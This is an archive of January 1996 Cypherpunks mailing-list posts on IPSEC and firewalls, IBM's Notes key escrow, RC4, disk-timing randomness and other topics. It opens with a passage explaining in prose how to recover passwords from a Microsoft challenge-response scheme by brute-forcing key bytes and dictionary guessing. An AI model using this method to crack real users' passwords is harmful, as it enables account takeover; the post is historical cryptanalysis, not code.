Unfortunately, I don't have time right now to follow up with a sample
exploit program or anything.  Sorry 'bout that.

Microsoft should have used a real crypto-quality hash function (e.g. MD5),
instead of trying to synthesize one from multiple concatenations of DES.

The technical details on the attacks follow.




Call the bytes of the password P_0 .. P_13, the 16-byte key K_0 .. K_15,
and the response R_0 .. R_23; and call the challenge C and the static 8-byte
server key S; K is generated by DES encrypting S with P, and R by DES
encrypting C with K.

I know C,R and want to find P_7 .. P_13.  First, try all possible values of
K_14, K_15; the right value can be recognized when C_16 .. C_23 encrypts to
R_16 .. R_23 under K_14, K_15, 0, 0, 0, ..  Now that we know K_14, K_15,
I can try the likely values of P_7 .. P_13; wrong values can be quickly
discarded by trial encrypting S under P_7 .. P_13 and noting whether the
last two bytes of the ciphertext equal K_14, K_15.  Each remaining guess
for P_7 .. P_13 gives me a candidate for K_8 .. K_13; I can check all K_7
possibilities to see if there's any for which C_8 .. C_15 encrypts to
R_8 .. R_15 under the K_7 .. K_13 candidate.  If there is such a K_7, the
guess for P_7 .. P_13 is almost certainly correct; if not, try another
candidate for P_7 .. P_13.  If there are N likely values of P_7 .. P_13,
this recovers the true value of P_7 .. P_13 with about N trial encryptions.

Note that there is no salt used; in fact, if I'm willing to do N precomputed
trial encryptions, recovering the true value of P_7 .. P_13 takes N / 2^16
work.

Once I've found P_7 .. P_13, if I'm willing to do M precomputations [where
M is the number of likely values of P_0 .. P_6], then recovering the true
value of P_0 .. P_6 can be done with about M / 2^8 trial encryptions.
(If I'm not willing to do precomputations, it'll take M trials.)

Did that make any sense?
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMQQYSioZzwIn1bdtAQFKkAGAqcC2ZoZsSHEUiqU8envvqHLI9vfi4xnf
aexUGBX10peIeh3TSzq9RcMU2c8FxT45
=xQGr
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Edgar Swank <edgar@Garg.Campbell.CA.US>
Date: Mon, 22 Jan 96 18:32:06 PST
To: Cypherpunks          <cypherpunks@toad.com>
Subject: IBM knuckles under
Message-ID: <a0w5HD15w165w@Garg.Campbell.CA.US>
MIME-Version: 1.0
Content-Type: text/plain


IBM TO PROVIDE GOVERNMENT WITH ENCRYPTION KEY FOR NOTES
IBM has agreed to provide the U.S. government with a special key that would
enable government agents to more easily decode electronic messages, in
exchange for permission to export a version of Lotus Notes that includes
64-bit security.  The arrangement provides government officials with a key
to the first 24 bits of security code, meaning that they only have to crack
the remaining 40 bits to decrypt a message.  U.S. Notes customers already
use a 64-bit system.  "We were desperate enough to try to negotiate a
short-term, pragmatic solution," says Notes developer Ray Ozzie.  "But we do
not believe this is the right long-term solution...  Our customers have been
telling us that, unless we did something about the security, we could no
longer call it a secure system."  (Wall Street Journal 18 Jan 96 B7)

-- 
edgar@Garg.Campbell.CA.US (Edgar Swank)
The Land of Garg BBS -- +1 408 378-5108




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp, KHIJOL SysAdmin" <erc@dal1820.computek.net>
Date: Mon, 22 Jan 96 16:26:42 PST
To: tcmay@got.net (Timothy C. May)
Subject: Re: The Collapse of Ideas in a Pop Culture
In-Reply-To: <ad2914530a021004e9eb@[205.199.118.202]>
Message-ID: <199601230026.TAA29395@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


> Tim May sez:

> And "Wired" is frustratingly repetitive, trendy, over-busy with graphics,

I stopped buying Wired because I never could find anything but page after
page of print that looked like it had been cut out of several different
newspapers and magazines and glued to the page, along with gaudy,
hard-on-the-eyes graphics.  I never got past the graphics to the 
less-than-stellar articles.

> are the Jules Bergmanns of our modern age. (If you don't know who Jules
> Bergmann was, you're a GenXer and can't be held responsible for your
> ignorance :-}.)

Gee ... someone who knows *real* reporting!  I'm suitably impressed, Tim ;)

> them to "Applied Cryptography," to "The Puzzle Palace," and even to
> articles on digital cash in "Scientific American."

The problem is, books aren't getting any cheaper, and to build a decent 
technical library takes several hundred dollars - not to mention the $200 
or $300 a year it takes just to stay current.

> The answer is that in-depth study of ideas hasn't changed much. The
> Tofflerian idea of "overchoice" is solvable by simply ignoring the
> ephemeral cruft that threatens to engulf us.

Read lots of book reviews by people you trust. :) If I looked at every
book on the shelf that had the word "Internet" in the title, I'd be in the
bookstore from dawn till dusk.  There used to be two or three really good
books on VB on the shelves - and a couple of ones that I'd classify as
"fair".  Yesterday, I counted almost 50 different books on VB at Barnes &
Noble.  It's getting rediculous.  Like someone's claim to fame is they've
written a computer book.  The market's *way* oversaturated, yet the
clueless publishing houses keep cranking 'em out, all in an attempt to get
a piece of the pie, I suppose. 

Buyer beware is my new motto.
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 22 Jan 96 19:43:10 PST
To: cypherpunks@toad.com
Subject: Re: Ultimate Paranoia
Message-ID: <m0teYr8-00091yC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 12:10 PM 1/22/96 +0100, Anonymous wrote:
>Fellow Cypherpunks,
>
>I have been lurking around for some time and I have learned alot, But I have
>a few questions that I either haven't seen posted or I've missed all together.
>
>I keep PGP stored on a removable hard drive and keep it under lock and
>key when it's not in use.  I write and encrypt messages on a stand-alone
>computer,
>that I only have access to. My passphrase is rather long and full of gibberish,
>But I still fear the other things that I can not control.

Gives you a headache, doesn't it? <G>  Welcome to the club!
>
>Does anyone make and sell a device that emits white and pink noise?

Reverse-biased zener diodes produce bandwidth-limited white noise.  Pink 
noise is (I think) white noise filtered 3db per octave with a lowpass filter.

>
>How do you take the randomness collected from radation sensors to create
>a truly random sample for creating a PGP key?

Dunno.  I'm not a programmer.

>Is there anything else that I might be missing besides lining the walls &
>computer 
>in tin foil?   :^) 

The best defense is a good offense.  

Klaatu Burada Nikto.   (Remember this... It'll become important...soon.)
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQRNTvqHVDBboB2dAQGTyQP/Vkf84+SUZLkQ1o/yXqma4M/vh5gy/KBp
uyM2LarS8wL361qo8SBj8wxt1htclJmOYEyoI0A4vEdAKircsnLNK35NLA4ZZQyx
oBrMGo+KY6wpz28/SbOLeslk6DcjIhbkd/r1+ntGt62QQESb7TMjG+XLaVJiu/Ri
HD9vwrhrJs8=
=qDYN
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Patiwat Panurach  (akira rising)" <pati@ipied.tu.ac.th>
Date: Mon, 22 Jan 96 03:52:32 PST
To: cypherpunks@toad.com
Subject: Econo-terrorism against Iraq
In-Reply-To: <199601200830.AAA07615@mailx.best.com>
Message-ID: <Pine.SUN.3.91.960122185412.25584A-100000@ipied>
MIME-Version: 1.0
Content-Type: text/plain


	I remember once reading in cypherppunks about how the US 
government used counterfeit money as an economic warfare tool against 
Iraq during the war.  Can anyone give me anymore pointers to this?  Is it 
comfirmed?  
	If you feel this is of topic, pleasea email me personally.

-------------------------------------------------------------------------------
Patiwat Panurach      	     Whatever you can do, or dream you can, begin it.
eMAIL: pati@ipied.tu.ac.th      Boldness has genius, power and magic in it.
m/18 junior Fac of Economics		-Johann W.Von Goethe
-------------------------------------------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nelson Minar <nelson@santafe.edu>
Date: Mon, 22 Jan 96 18:00:11 PST
To: cypherpunks@toad.com
Subject: IPSEC == end of firewalls (was Re: (fwd) e$: PBS NewsHour, Path Dependency, IPSEC, Cyberdog, and the Melting of Mr.)
In-Reply-To: <v02120d17ad296f1e1a73@[199.0.65.105]>
Message-ID: <199601230159.SAA00256@nelson.santafe.edu>
MIME-Version: 1.0
Content-Type: text/plain


rah@shipwright.com (Robert Hettinga) writes:
[interesting article about the future, which includes..]

>The reason we won't need LANs is because the only real difference between a
>LAN and the internet is a firewall for security, and the need for clients
>to speak Novell's TCP/IP-incompatible proprietary network protocol.  With
>internet-level encryption protocols like the IETF IPSEC standard, you won't
>even need a firewall anymore.  The only people who can establish a server
>session with *any* machine connected to the net will be those issuing the
>digital signatures authorized to access that machine, no matter where those
>people are physically. When that happens, networks will need to be as
>public as possible, which means, of course, TCP/IP, and not Netware.

I'm all for the end of ridiculous non-TCP/IP protocols, but does
anyone believe this point about encrypted IP traffic eliminating the
need for firewalls?

I guess I don't trust the ability for people to keep secrets secret.
Nothing like refusing to pass packets at all..




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Mon, 22 Jan 96 16:44:38 PST
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <9601230044.AA21218@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
From: jf_avon@citenet.net
date: jan 22 1996

Hi!

I read the work Cypherpunk often in alt.security.pgp and alt.privacy

I had no idea what it is.  So I hit Lycos and it led me to various, but unfortunately unclear articles.

So, here is my question: what is cypherpunk?

I suppose, from the adress, that it is some type of mailing list.

If yes, could anybody send me the "how to subscribe" file?

Thanks.

JFA

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQQtqgOWptJXIUrtAQHUOwQAr5vF68AwsnWE39eMKhy6Vj67ke0JkjRM
GN8q+6hSO5egg7l/T7XZidrnHDa7hpK0xJ8SoUJXAgG6oIpGJZcjzS3FqgxVeFiL
lVONV/ac1PQt0cDDTQ2kTdFEYWOCAGJBRjVa0tO4W2CKY1IavqrQ+23cJkDxVh8e
O1a/X1n5TVA=
=HSGk
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Patiwat Panurach  (akira rising)" <pati@ipied.tu.ac.th>
Date: Mon, 22 Jan 96 04:35:08 PST
To: ecash@digicash.com
Subject: double-spending ecash
In-Reply-To: <9601112011.AA25213@toad.com>
Message-ID: <Pine.SUN.3.91.960122193424.25584C-100000@ipied>
MIME-Version: 1.0
Content-Type: text/plain


	Double spending using ecash isn't possible, but why so?  Is it 
because of the verification protocol?  Or is it an implication of the 
isueing intricacies?
	And how about tracing, is it merely unfeasable that ecash 
spending can be traced, or is it mathamatically impossible to trace?
	Any explanations or pointers would be extremely helpful.  

-------------------------------------------------------------------------------
Patiwat Panurach      	     Whatever you can do, or dream you can, begin it.
eMAIL: pati@ipied.tu.ac.th      Boldness has genius, power and magic in it.
m/18 junior Fac of Economics		-Johann W.Von Goethe
-------------------------------------------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 22 Jan 96 07:59:09 PST
To: David Mazieres <cypherpunks@toad.com
Subject: Re: Why is blowfish so slow?  Other fast algorithms?
Message-ID: <199601221601.IAA14610@mailx.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:00 AM 1/22/96 -0500, David Mazieres wrote:
>Failing that, can anyone suggest other secure, preferably unpatented,
>shared-key encryption algorithms that could encrypt at ethernet speeds
>(1 MByte/sec) without using most of the CPU on a fast Pentium or
>equivalent processor?

RC4 is of course unpatented and faster than anything else.
Of course the name RC4 is trademarked, so you could simply 
call it "the well known algorithm" in your documentation 
and give the algorithm explicitly.

RSA's present legal gimmicks seem to me to be based on the "trade secret"
that RC4 really is the well known algorithm, so if you refrain from 
using the name "RC4", you should be OK.  (I am not a lawyer.)



T


>
>Thanks a lot,
>David
>
>
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous User <nobody@c2.org>
Date: Mon, 22 Jan 96 20:23:15 PST
To: cypherpunks@toad.com
Subject: PZ a Nazi?
Message-ID: <199601230400.UAA29972@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Original dated: Jan 21 '96, 09:26

The UK's Sunday Telegraph has today featured an article by Robin
Gedye entitled "Neo-Nazis are marching on the Internet" in which
apart the the usual nonsense about neo-Nazis being about to take
over the world by means of their "Thule Net" accuses the deviser
of PGP of being a Nazi sympathiser:

"Private communications between neo-Nazis on the network are
effected under a program called "Pretty Good Privacy", devised by
an American neo-Nazi sympathiser."

  Robin Gedye (in Bonn) p.23 of "The Sunday Telegraph" January 21,
  1996




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Mon, 22 Jan 96 17:18:14 PST
To: Anonymous <nobody@REPLAY.COM>
Subject: Re: CIA Stashes and Looted Gold?
In-Reply-To: <199601222329.AAA04627@utopia.hacktic.nl>
Message-ID: <Pine.SV4.3.91.960122201232.11499G-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


The weapons and the gold are property of US taxpayers. We should not give
anything to the Austrians. If they are too stupid to quietly maintain an
emplaced civil-defense network, let them not come crying to CNN when it's
their turn to be Chechnya'd. 

The russkies have more balls than the US Congress. I bet Ivan won't be 
meekly handing over anything to this Vranitsky fellow.

Alan Horowitz
alanh@norfolk.infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 22 Jan 96 17:42:08 PST
To: Alan Horowitz <alanh@infi.net>
Subject: Re: CIA Stashes and Looted Gold?
In-Reply-To: <Pine.SV4.3.91.960122201232.11499G-100000@larry.infi.net>
Message-ID: <199601230141.UAA08506@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Could someone please explain why guns in the hills in Austria is
Cypherpunks material?

.pm

Alan Horowitz writes:
> The weapons and the gold are property of US taxpayers. We should not give
> anything to the Austrians. If they are too stupid to quietly maintain an
> emplaced civil-defense network, let them not come crying to CNN when it's
> their turn to be Chechnya'd. 
> 
> The russkies have more balls than the US Congress. I bet Ivan won't be 
> meekly handing over anything to this Vranitsky fellow.
> 
> Alan Horowitz
> alanh@norfolk.infi.net
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 22 Jan 96 18:08:06 PST
To: Nelson Minar <nelson@santafe.edu>
Subject: Re: IPSEC == end of firewalls (was Re: (fwd) e$: PBS NewsHour, Path Dependency, IPSEC, Cyberdog, and the Melting of Mr.)
In-Reply-To: <199601230159.SAA00256@nelson.santafe.edu>
Message-ID: <199601230207.VAA08601@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Nelson Minar writes:
> I'm all for the end of ridiculous non-TCP/IP protocols, but does
> anyone believe this point about encrypted IP traffic eliminating the
> need for firewalls?

There is division in the IETF community on this point.

Phil Karn (who I have the greatest respect for) thinks IPSEC means we
can get rid of the firewalls. I, for one, don't -- they are there
largely because people don't trust that their networking software is
free of security holes, and cryptography doesn't fix security holes
for the most part.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 22 Jan 96 18:34:01 PST
To: nelson@santafe.edu (Nelson Minar)
Subject: Re: IPSEC == end of firewalls (was Re: (fwd) e$: PBS NewsHour, Path Dependency, IPSEC, Cyberdog, and the Melting of Mr.)
In-Reply-To: <199601230159.SAA00256@nelson.santafe.edu>
Message-ID: <199601230238.VAA00706@homeport.org>
MIME-Version: 1.0
Content-Type: text


IPsec will not change the role of firewalls.  It will change some
technical details about them.

Firewalls do a couple of things:

	Enforce a policy boundary between us & them.  Reduce the
number of systems to be 'well secured' (This is because really
securing a machine is tough, and often involves sacrifices of
useability.) Provide job security/ass covering (see also, satisfy
auditors.)

	The fact that some traffic passing through is encrypted will
not change any of this.  Only allowing traffic to people who provide a
signature is only useful for some things.  Besides, there will always
be shitty protocols, like NFS, yp, SMTP, etc that need a firewall to
protect them.  Legacy systems are with us forever.  (I was in a
meeting last Thursday where we discussed how to handle a Sun3 that
needs to be a router in a CIDR environment.  No option to upgrade this
box for complex reasons.  I bring it up to illustrate the persistance
of legacy systems.)

Nelson Minar wrote:
| rah@shipwright.com (Robert Hettinga) writes:
| [interesting article about the future, which includes..]
| 
| >The reason we won't need LANs is because the only real difference between a
| >LAN and the internet is a firewall for security, and the need for clients
| >to speak Novell's TCP/IP-incompatible proprietary network protocol.  With
| >internet-level encryption protocols like the IETF IPSEC standard, you won't
| >even need a firewall anymore.  The only people who can establish a server
| >session with *any* machine connected to the net will be those issuing the
| >digital signatures authorized to access that machine, no matter where those
| >people are physically. When that happens, networks will need to be as
| >public as possible, which means, of course, TCP/IP, and not Netware.
| 
| I'm all for the end of ridiculous non-TCP/IP protocols, but does
| anyone believe this point about encrypted IP traffic eliminating the
| need for firewalls?
-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an253362@anon.penet.fi (Hell's Angel)
Date: Mon, 22 Jan 96 14:35:31 PST
To: cypherpunks@toad.com
Subject: request mailing list
Message-ID: <9601222229.AA07479@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



please include in mailing list

--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Mon, 22 Jan 96 22:36:37 PST
To: cypherpunks@toad.com
Subject: SS Obergruppenfuhrer Zimmermann (NOT!)
Message-ID: <199601230635.WAA22844@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous User <nobody@c2.org> writes:

 > "Private communications between neo-Nazis on the network are
 > effected under a program called "Pretty Good Privacy",
 > devised by an American neo-Nazi sympathiser."

 > Robin Gedye (in Bonn) p.23 of "The Sunday Telegraph"
 > January 21, 1996

Before anyone takes this nonsense too seriously, one should
realize that the exhibition of such microscopic views of
technology by journalists and politicians is fairly common.

Who can forget Caspar Weinburger's stirring speech in front of an
illegally exported low-end VAX, explaining that the machine was a
sophisticated electronic device for the tracking of missiles and
troop movements, now in the hands of America's enemies.

Then there was the newspaper article which explained in perfect
seriousness that "GIF" was a secret computer code used by child
molesters to encode images of their victims.

Characterizing PGP as a neo-Nazi tool for private communications
written by a sympathizer, while absurd in a larger sense, is
hardly sillier than the prior examples.  And all such scenarios
contain a microscopic grain of truth as seen by someone somewhere
with a severe case of tunnel vision.

The reporter no doubt reports correctly that some neo-Nazis use
PGP to communicate privately.  Doubtless PKZ supports the right
of all people, including those with diverse political views, to
conduct legal private conversations which cannot be overheard by
their governments, as do most of the people on this list.  I
suppose in some obtuse sense this is sympathy.

It is highly unlikely that anyone who uses Cypherpunk technology
is as ignorant as this reporter.  So let's just mail the poor guy
a clue and move on.  Things like this happen often, and it's not
really worth a prolongued debate.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Mon, 22 Jan 96 19:59:31 PST
To: perry@piermont.com
Subject: Re: IPSEC == end of firewalls (was Re: (fwd) e$: PBS NewsHour, Path Dependency, IPSEC, Cyberdog, and the Melting of Mr.)
In-Reply-To: <199601230207.VAA08601@jekyll.piermont.com>
Message-ID: <9601230342.AA04490@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain


	Perry writes...
> 
> can get rid of the firewalls. I, for one, don't -- they are there
> largely because people don't trust that their networking software is
> free of security holes, and cryptography doesn't fix security holes
> for the most part.

	Perhaps I'm nieve, but I've always understood that one of the
primary functions firewalls accomplish is insulating from most easy
attacks large numbers of random machines in an organization that may not
be all perfectly administered, 100% under control of competant security
wise users, and configured correctly for maximum security with all the
latest rev's of stuff.

	Seems unclear that IP level security and authentication will
totally eliminate the problems caused by buggy software and 
clueless or careless users, or overloaded security staffs who
don't have time to update everybody and check everything immediately
on networks with thousands of machines.

	Having one or two machines to keep secure instead of thousands
seems like a big win.

						Dave Emery





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger.Clarke@anu.edu.au (Roger Clarke)
Date: Mon, 22 Jan 96 03:48:52 PST
To: cypherpunks@toad.com
Subject: Re: (cpx) Australian GAK?
Message-ID: <v02130555ad2923c9852d@[150.203.148.139]>
MIME-Version: 1.0
Content-Type: text/plain



sdavidm@iconz.co.nz (David Murray) asked cypherpunks@toad.com:

>I've just seen a note to the effect that the (Australian) Senate Economics
>References Committee has recommended, in their recently tabled report
>quaintly entitled _Connecting You Now...Telecommunications to the Year
>2000_ the establishment of a third party body for the management of public
>key authentication.
>
>The Committee has also recommended the establishment of a national
>authentication system to be recognised internationally with credibility
>>with the legal system - True Names, most probably.
>
>Any c'punks closer to Canberra with the real goods?


So far, very few Australian Senate documents are up on the net (honourable
exception:  those of those of the Committee on 'Community Standards' and
on-line services);  but keep your eye on them, and maybe they'll catch up:
http://senate.aph.gov.au/

Steve Orlowski from the Australian Attorney-General's Department wrote a
paper in November/December 1995 which outlined the idea.  He's given me
permission to put it up.  Me?  I'm just playing proxy until A-G's really
come to believe in this medium (:-)}
http://www.anu.edu.au/people/Roger.Clarke/II/Orlowski3

While you're at it, check these two out as well, and hit me with anything
that'll improve them:

-   hot-links concerned with regulation of the net:
http://www.anu.edu.au/people/Roger.Clarke/II/Regn

-   a compendium of things that go bump on the net:
http://www.anu.edu.au/people/Roger.Clarke/II/Netethiquettecases


Roger Clarke              http://www.anu.edu.au/people/Roger.Clarke/
Xamax Consultancy Pty Ltd, 78 Sidaway St, Chapman ACT 2611 AUSTRALIA
Tel:  +61  6  288 6916                       Fax:   +61  6  288 1472

Visiting Fellow, Faculty of          Email:  Roger.Clarke@anu.edu.au
    Engineering and Information Technology
Information Sciences Building Room 211       Tel:   +61  6  249 3666
The Australian National University
Canberra   ACT   0200   AUSTRALIA            Fax:   +61  6  249 0010






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 22 Jan 96 23:01:19 PST
To: die@die.com
Subject: Re: IPSEC == end of firewalls (was Re: (fwd) e$: PBS NewsHour, Path Dependency, IPSEC, Cyberdog, and the Melting of Mr.)
In-Reply-To: <9601230342.AA04490@pig.die.com>
Message-ID: <Pine.SOL.3.91.960122224319.8040C-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


I tend to oscillate between the two positions; at the moment I think that 
firewalls are still needed with IPSEC.

Firewalls cannot be removed if

	1) You need to control outbound as well as inbound traffic
	2) There are still non IPSEC machines on the network.
	3) There are network services on IPSEC machines that do not 
	   understand IPSEC security, and which cannot be easily secured 
	   through IPSEC aware wrappers.

I can't see anyway to cope with the first problem- however the latter two 
are legacy headaches, which tend to clear up given time.

What I do see happening is more and more IPSEC machines moving out into
a quasi-DMZ as it becomes much easier to make ordinary machines secure 
enough to go over-the-top; however, it'll take more than just IPSEC to 
make this fool-proof enough to move everybody out there.

One worry I do have is that if such a machine is misconfigured it could 
cause more damage as that machine is trusted more because it's using 
IPSEC. 

Simon


(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pclow@pc.jaring.my (Peng-chiew Low)
Date: Mon, 22 Jan 96 07:23:11 PST
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Hassles taking App. Crypt. to Taiwan?
Message-ID: <199601221522.XAA29618@relay3.jaring.my>
MIME-Version: 1.0
Content-Type: text/plain


>If this were Singapore, they might consider it subversive literature,
>because it is :-)  

...............and the next thing you'll probably say is that Asians live in
tree houses
and have pet gorillas or whatever :)......





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 22 Jan 96 20:35:21 PST
To: cypherpunks@toad.com
Subject: Random noise from disk drives
Message-ID: <9601230431.AA06742@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Don Davis  has done some interesting/important/widely-referenced work on
using disk latencies as a random number source.  We were talking about
some of his techniques, and he kindly gave me permission to forward along
his email.  He's not on the list, so I cc'd him.
	/r$

--------------------forwarded message-----------------
well, if you're willing to accept a temporary peak
load on your machine, then a paging rng is easy to
write.

the basic idea that worked is:
    * allocate a little more memory than is available in ram;
    * walk through it in steps of a prime # near 4kb or 5kb;
    * time each access with whatever system clock is easiest;
    * throw away accesses that take less than 5 millisec or so;
    * keep only the parity of each access that remains.

naturally, on the first passes through the array, you'll
get mostly fast accesses; thereafter, most accesses
will cause page-faults. mostly a page-fault's access-time
reflects where the page was on the disk, where the head
and spindle were before the page-fault, etc. that's why
you keep only the parity. however, you're not going to
get a bit of entropy from every access, by any means.

the reason for a prime-valued step is that you want to be
sure of visiting every page, but you don't want to have
to know the page-size. (i haven't checked this trick yet;
i used 2kb or 4kb steps, if i remember correctly).

the reason for the 5 msec cutoff is that it's rare for
a disk access to happen so fast, and you want to screen
out other causes of non-immediate memory accesses. you'll
only get a real access that fast, if at the moment of the
page-fault, the head's already in the right track, and if
the block you want is less than a third of a rev away
from the head.

i used a byte-indexed table to get the parity quickly.
you don't really need to bother packing the parity bits
into bytes; store the 1's and 0's as chars into the md5
buffer, & hash it; then, put the hash itself into the
buffer, xor more 1's & 0's back in on top, rehash, etc.
running md5 8 times as often as necessary doesn't matter.

note that this algorithm should defeat caching disk
controllers, but i haven't checked for sure. if it
doesn't, the symptom will be long stretches of fast
access-times.

any fancy stuff you put in, like feeding noise-bits
back into your path through the array, is a bad idea;
first, it really only adds pseudo-randomness; second,
it's liable to reduce the frequency of page-faults.
though i knew it was a bad idea, i tried it anyway,
lots of ways, and that's what i found. simple is best.

really, the only complicated code should be outside
the rng: reallocating when memory availability changes,
minimizing the ui, stuff like that.

it is worthwhile to run find, or some other filesys-
traversing program, while you're running the paging-rng.
the benefit is not from the changed paging-times, but
from the extra head-motion, which perturbs the spindle
speed.

if you choose to measure the rng's quality, study the
raw parity-bits, not the hashed output. the hashes would
look perfectly random, even if the parity bits were periodic.
look for periodicity (fft), long-term autocorrelation,
and measure the entropy with an entropy estimator. don't
bother with runs tests and the others; the hashing will
produce nice output bits, even if the parity inputs
are periodic or are highly correlated in the long-run.
but if they're not periodic and uncorrelated, the
output bits will be random, instead of pseudo-random.

on the only machine i studied closely, i got 100 bits/min, 
with a 1 khz interrupt-clock; if your interrupt schedule
is more frequent, then you can expect proportionally more
entropy.  remember that even for long rsa keys, you only
need enough entropy to prevent exhaustive key-search.
use 100 bits or so to seed the prng, then use the prng
to generate a prime.  reseed for each prime, and as
often as you can for symmetric session-keys. i don't
trust pseudo-random key-generation (it's no surprise
that i don't, i suppose).

please let me know if anything comes of this, like if
someone builds it properly before i get around to it.
i suppose i ought to build it, test it, and write a paper
about how much fun it was, but i have too much work, and
too many papers to write.
					-don davis, boston
-----------------egassem dedrawrof--------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: teg <teg@one.net>
Date: Mon, 22 Jan 96 20:39:26 PST
To: cypherpunks@toad.com
Subject: FORSALE: HP48GX
Message-ID: <199601230436.XAA12758@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Given the usefulness of an HP calculator as a secure point
of encryption, someone might be interested in my old calculator.
I haven't used it since I graduated, except for balancing my
old business books, way overkill.  I'd love to give it a good home.


HP 48 GX Calculator
  The most powerful calculator in the world
  Currently loaded with many Applied Math and Engineering
  programs written by myself (yours free with the calculator ;-)
  About 2 years old, excellent condition
  $125, negotiable

HP IR Calculator Printer
  Infrared printer for the HP line of calculators
  Very light, battery operated
  About 2 years old, excellent condition
  $75, negotiable


Please contact me if you are interested.

My apologies if you consider this post selfinterest and off topic.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMQRl3CoZzwIn1bdtAQGoYQF9GrClhiKQZgx9RApC2G7fwRZllDV8sNcx
sX+Vr8tk1FqXRqZkCHa6UrZRS3xm/91o
=pzQ7
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 22 Jan 96 20:49:32 PST
To: cypherpunks@toad.com
Subject: Re:  Random noise from disk drives
Message-ID: <9601230445.AA06760@sulphur.osf.org>
MIME-Version: 1.0
